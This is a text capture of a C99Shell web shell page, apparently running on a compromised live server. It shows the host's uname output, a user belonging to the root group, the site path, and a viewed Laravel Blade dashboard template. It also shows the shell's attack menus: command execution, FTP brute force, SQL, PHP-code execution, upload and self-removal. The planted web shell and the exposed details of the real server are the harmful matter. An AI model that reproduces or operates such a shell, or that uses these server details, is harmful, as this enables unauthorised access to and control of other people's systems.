!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/classify.picotech.app/public_html/resources/views/frontend/layouts/   drwxr-xr-x
Free 29.37 GB of 117.98 GB (24.9%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     dashboard.blade.php (1.4 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
@extends('frontend.layouts.app')
@section('content')
    @yield('breadcrumb')
    <section class="lg:py-16 py-6 dark:bg-gray-800">
        <div class="container">
            @if (session('error'))
                <div class="flex items-center p-4 mb-4 text-sm text-red-800 rounded-lg bg-red-50 dark:bg-gray-800 dark:text-red-400"
                    role="alert">
                    <x-svg.error-icon />
                    <span class="sr-only">Info</span>
                    <div>
                        <span class="font-medium">
                            {{ session('error') }}
                        </span>
                    </div>
                </div>
            @endif
            <div class="lg:hidden flex pb-6 justify-between items-center" x-data="{dashboardMenu : false}">
                <h2 class="heading-07 dark:text-white">Dashboard</h2>
                <button class="bg-primary-500 rounded py-0.5 px-1" @click="dashboardMenu = !dashboardMenu">
                    <x-svg.menu-icon />
                </button>
                <x-frontend.dashboard-menu />
            </div>
            <div class="flex flex-col lg:flex-row items-start gap-8">
                @include('frontend.layouts.partials.dashboard-sidebar')
                <div class="dashboard-content w-full">
                    @yield('dashboard-content')
                </div>
            </div>
        </div>
    </section>
@endsection

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0044 ]--